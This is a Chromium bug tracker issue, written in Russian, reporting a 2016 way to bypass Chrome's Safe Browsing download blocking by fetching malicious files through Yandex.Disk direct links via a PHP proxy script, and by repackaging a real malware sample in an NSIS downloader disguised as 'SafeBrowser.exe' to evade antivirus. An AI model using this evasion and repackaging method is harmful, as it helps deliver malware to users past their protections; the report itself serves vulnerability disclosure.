New issue
Advanced search Search tips

Issue 601125 link

Starred by 1 user

Issue metadata

Status: Duplicate
Merged: issue 605438
Owner: ----
Closed: Apr 2016
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: ----
Type: Bug



Sign in to add a comment

Метод скачивания вредоносных файлов обход Safe Browsing

Reported by gordeev....@gmail.com, Apr 6 2016

Issue description

Ниже описан метод загрузки файлов признанных Chrome как вредоносные.
I. Использование файлов предоставленных на странице https://www.google.com/about/appsecurity/chrome-rewards/

1) Файлы content.exe и pua.exe загружаем на Яндекс.Диск (https://disk.yandex.ru/) , получаем ссылки на файлы: https://yadi.sk/d/cl5avITiqnmtz и https://yadi.sk/d/AoYD9FZOqnnPe соответственно, которые в дальнейшем мы будем использовать при обращение к https://cloud-api.yandex.net из php скриптов.
2) Для наглядного примера реализации нашего метода, мы создали страницу  http://test.files-hub.com, на которой размещены ссылки для скачивания файлов разными методами:
2.1. С помощь Яндекс.Диск-а, более подробно данный метод описан ниже
2.2. Прямая загрузка с нашего сервера
2.3. Ссылки предоставленные на https://www.google.com/about/appsecurity/chrome-rewards/
Второй и третий способ загрузки, Chrome блокирует файлы как вредоносные, а метод с использованием Яндекс.Диска-а благополучно позволяет загрузить файлы.

Описание метода загрузки с помощью Яндекс.Диска:
1) При клике пользователем на ссылку download выполняется ajax запрос к URL http://test.files-hub.com/request
2) http://test.files-hub.com/request — это php скрипт, который делает запрос с помощью curl к https://cloud-api.yandex.net  в качестве параметра передавая одну из ссылок на файл указанных в п.1, и получая в ответ прямую ссылку на необходимый файл.
3) Полученный URL от https://cloud-api.yandex.net передается в качестве ответа на ajax запрос со страницы http://test.files-hub.com
4) Прямая ссылка подставляется в значение window.location.href используя javascript, после чего начинается загрузка файла.

Файл request.php
<?php
if(isset($_GET['v'])){
	if($_GET['v']==1)
		$link = "https://yadi.sk/d/cl5avITiqnmtz"; //content.exe
	else if($_GET['v']==2)
		$link = "https://yadi.sk/d/AoYD9FZOqnnPe"; //pua.exe
	else if($_GET['v']==3)
		$link = "https://yadi.sk/d/Ml4JugUgqmwLS"; //safebrowser.exe
}
if(isset($link)){
	$url = "https://cloud-api.yandex.net:443/v1/disk/public/resources/download?public_key=".urlencode($link);
	$handle = curl_init();
	curl_setopt($handle, CURLOPT_URL, $url);
	curl_setopt($handle, CURLOPT_SSL_VERIFYPEER, false);
	curl_setopt($handle, CURLOPT_SSL_VERIFYHOST, false);
	curl_setopt($handle, CURLOPT_RETURNTRANSFER, true);
	$response = curl_exec($handle);
	$code = curl_getinfo($handle, CURLINFO_HTTP_CODE);
	if($code == 200){
		echo $response;
	}
}
?>

II. Метод загрузки другого вредоносного файла

1) В интернете находим файл goinf_plugin_cis.exe и проверяем его на virustotal.com, ссылка на отчет:  https://virustotal.com/ru/file/9cd6e5b256a4b446826c5b37d8ca7510937131e5ea9706ee96cc67fde1560792/analysis/1459929170/
2) Файл goinf_plugin_cis.exe загружаем на сервер, ссылка http://test.files-hub.com/files/goinf_plugin_cis.exe
3) С помощью системы создания установочных программ NSIS собираем инсталлер (SafeBrowser.exe), главная задача которого загрузка и установка основного exe-файла, содержащего вредоносный код.
4) Проверяем файл SafeBrowser.exe на virustotal.com, ссылка на отчет: https://virustotal.com/ru/file/45b5013282aa4f428a36257ee339775ca7e02d7fac87b512ff9c7e0c393ea793/analysis/1459959870/
Количество антивирусных программ которые определяют файл как вредоносный значительно меньше, но некоторыми антивирусы считают его вредоносным.
5) Загружаем файл SafeBrowser.exe на Яндекс.Диск (https://disk.yandex.ru/) и получаем ссылку на файл https://yadi.sk/d/Ml4JugUgqmwLS
6) Для наглядного примера ссылки на данный файл также были расположены на странице  http://test.files-hub.com


VERSION
Chrome Version: 49.0.2623.110 m
Operating System: Microsoft Windows 7 Service Pack 1 /  Microsoft Windows 10 version 1511
 
Owner: ----
Здравствуйте. Эта проблема будет решаться или она вас не интересует?

Comment 3 by vakh@chromium.org, Apr 21 2016

Mergedinto: 605438
Status: Duplicate (was: Unconfirmed)
Seems like a duplicate of 605438, based on the code in bug description.

Comment 4 by vakh@chromium.org, Mar 10 2017

Labels: -Restrict-View-Google Restrict-View-SecurityTeam
For all Download Protection VRP bugs: removing label Restrict-View-Google and adding Restrict-View-SecurityTeam instead.
Project Member

Comment 5 by sheriffbot@chromium.org, Mar 11 2017

Labels: -Restrict-View-SecurityTeam allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Sign in to add a comment